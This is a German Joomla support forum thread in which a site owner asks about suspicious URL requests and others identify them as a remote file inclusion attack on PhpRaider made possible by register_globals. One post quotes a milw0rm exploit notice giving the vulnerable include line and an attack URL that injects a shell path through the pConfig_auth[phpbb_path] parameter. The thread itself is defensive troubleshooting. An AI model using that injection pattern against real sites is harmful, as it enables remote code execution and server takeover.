+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 11

Thema: Zugriff -- Seiten Url Frage

  1. #1
    Verbringt hier viel Zeit Avatar von Grazioli
    Registriert seit
    16.08.2006
    Ort
    Lachen SZ/ Schweiz
    Alter
    34
    Beiträge
    658
    Bedankte sich
    35
    Erhielt 139 Danksagungen
    in 128 Beiträgen

    Standard Zugriff -- Seiten Url Frage

    Hallo zusammen,

    ich habe von meinem Hoster eine Statistik mit einem Vermerk bekommen!

    In diesem Mail stand drin, dass jemand mit folgenden Links auf meine Seite zugegriffen hatte, aber diess keine Joomla-Standarturl's von mir sind!
    • /authentication/phpbb3/phpbb3.functions.php
    • //phpbb3/phpbb3.functions.php
    • /components/com_ponygallery/js/pngbehavior.htc
    • /4520.html
    • /components/com_securityimages/plugins/hncaptcha/1.0/imageGenerator.php

    Benutze Joomla 1.0.15 mit htacess vor dem Joomla Login!

    Bitte um Hinweise von Euch!?
    Grues Grazioli
    ------------------------

    www.int-firefighters.com / www.grazioli-web.ch / www.feuerwehr-lachen.ch

  2. #2
    Gehört zum Inventar Avatar von Taka
    Registriert seit
    23.05.2005
    Ort
    Downtown Zürich
    Alter
    39
    Beiträge
    5.067
    Bedankte sich
    152
    Erhielt 1.239 Danksagungen
    in 1.172 Beiträgen

    Standard

    Das ist eine Attacke auf PhpRaider 1.0.7 welche dank aktivem Register_Globals ermöglicht wird. Bei Erfolg, kann er PHP-Code ausführen und sogar Adminrechte ausüben! Also ich würde mir Sorgen machen und schnellstens versuchen die Lücke zu schliessen ggf solange die Seite vom Netz nehmen...

    Nachtrag: Hab das hier gefunden. Unter Solutions findest Du Infos zur Vorgehensweise:
    http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2481

  3. #3
    Verbringt hier viel Zeit Avatar von Grazioli
    Registriert seit
    16.08.2006
    Ort
    Lachen SZ/ Schweiz
    Alter
    34
    Beiträge
    658
    Bedankte sich
    35
    Erhielt 139 Danksagungen
    in 128 Beiträgen

    Standard

    Hallo,

    ist dies trotz Register Globals: OFF?

    Werde ich gerade machen!!
    Grues Grazioli
    ------------------------

    www.int-firefighters.com / www.grazioli-web.ch / www.feuerwehr-lachen.ch

  4. #4
    Gehört zum Inventar Avatar von Taka
    Registriert seit
    23.05.2005
    Ort
    Downtown Zürich
    Alter
    39
    Beiträge
    5.067
    Bedankte sich
    152
    Erhielt 1.239 Danksagungen
    in 1.172 Beiträgen

    Standard

    Zitat Zitat von Grazioli Beitrag anzeigen
    Hallo,

    ist dies trotz Register Globals: OFF?

    Werde ich gerade machen!!
    Die Rede ist nicht von "Register Globals Emulation" sondern von "Register Globals Setting". Um das zu deaktivieren brauchst Du Adminrechte über den Server.

    Hast Du die Links angeschaut? Dort gibt es bestimmt einen Fix für die Lücke, auch mit dieser Einstellung...

  5. #5
    War schon öfter hier Avatar von tux_linux
    Registriert seit
    28.04.2008
    Ort
    München
    Beiträge
    111
    Bedankte sich
    5
    Erhielt 20 Danksagungen
    in 19 Beiträgen

    Standard

    ich weiß nicht ob das was damit zu tun hat aber ich habe heute diese Nachricht gelesen:

    http://www.heise.de/security/Nun-auc...741/from/rss09

    Gruß
    Torsten

  6. #6
    Verbringt hier viel Zeit Avatar von Grazioli
    Registriert seit
    16.08.2006
    Ort
    Lachen SZ/ Schweiz
    Alter
    34
    Beiträge
    658
    Bedankte sich
    35
    Erhielt 139 Danksagungen
    in 128 Beiträgen

    Standard

    Hallo,

    ich musste diese auf Deutsch übersetzten, und habe aber kein Fix gefunden!!

    Seite ist Offline!!

    Wäre net, wenn jemand mir einen Link zu dem Fix schicken könnet, da ich nur sehr wenig Englisch kann!!
    Grues Grazioli
    ------------------------

    www.int-firefighters.com / www.grazioli-web.ch / www.feuerwehr-lachen.ch

  7. #7
    Verbringt hier viel Zeit Avatar von Grazioli
    Registriert seit
    16.08.2006
    Ort
    Lachen SZ/ Schweiz
    Alter
    34
    Beiträge
    658
    Bedankte sich
    35
    Erhielt 139 Danksagungen
    in 128 Beiträgen

    Standard

    HHallo,

    habe dies gefunden:
    Code:
    < ------------------- header data start ------------------- >
    
    #############################################################
    
    # Application Name : PhpRaider Mod phpbb3
    
    # Vulnerable Type : Remote File Include
    
    # Google Keyword : Powered by phpRaider v1.0.7
    
    # Infection : İlgili site ve sunucuya erişim sağlanabilir.
    
    # Bug Fix Advice : Undefined değerler, tanımlanmalıdır.
    
    # author : KaCaK a.K.a Dr.Hack3r
    
    # Error Code : include_once($pConfig_auth['phpbb_path'].'common.php');
    
    Kacakizm Bir Yaşam Felsefesi
    
    #############################################################
    
    < ------------------- header data end of ------------------- >
    
    
    
    < -- bug code start -- >
    
    www.site.com/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]
    
    /path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]
    
    < -- bug code end of -- >
    
    # milw0rm.com [2008-05-24]
    Wie muss ich diesen handhaben?!
    Grues Grazioli
    ------------------------

    www.int-firefighters.com / www.grazioli-web.ch / www.feuerwehr-lachen.ch

  8. #8
    Verbringt hier viel Zeit Avatar von Grazioli
    Registriert seit
    16.08.2006
    Ort
    Lachen SZ/ Schweiz
    Alter
    34
    Beiträge
    658
    Bedankte sich
    35
    Erhielt 139 Danksagungen
    in 128 Beiträgen

    Standard

    Hallo,

    ist dies jetzt ein Problem von Joomla oder von meinem Hoster?!
    Grues Grazioli
    ------------------------

    www.int-firefighters.com / www.grazioli-web.ch / www.feuerwehr-lachen.ch

  9. #9
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Register-Globals sollte immer(!) ausgeschaltet sein. Software, die noch diese EInstellung zwangsweise benötigt (es gibt da leider nicht einige Kandidaten) sollte man den Programmieren um die Ohren hauen...
    Vielen Hoster trauen sich nicht diese Option zu deaktvieren, weil sie Angst um einige Kunden haben die dann ggf. meckern könnten (eine andere Erklärung hab ich dafür nicht). Da läßt man lieber fatal sicherheitskritische Einstellungen stehen... Das Web ist voll von Meldungen über gehackte Server auf Basis dieser und anderer Einstellungen.

  10. #10
    Verbringt hier viel Zeit Avatar von Grazioli
    Registriert seit
    16.08.2006
    Ort
    Lachen SZ/ Schweiz
    Alter
    34
    Beiträge
    658
    Bedankte sich
    35
    Erhielt 139 Danksagungen
    in 128 Beiträgen

    Standard

    Hallo zusammen,

    ich habe meinem Hoster ein Mail geschrieben mit einem Link in dieses Forum!!

    Folgendes habe ich bis heute erhalten:
    Bei Ihrer Anfrage scheint es sich um ein umfangreicheres Problem zu handeln.
    Ich habe deshalb Ihre Anfrage direkt an unsere Administratoren weitergeleitet
    welche sich mit Ihnen in Verbindung setzen werden, sobald eine Lösung für Ihr
    Problem gefunden wurde.
    Grues Grazioli
    ------------------------

    www.int-firefighters.com / www.grazioli-web.ch / www.feuerwehr-lachen.ch

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein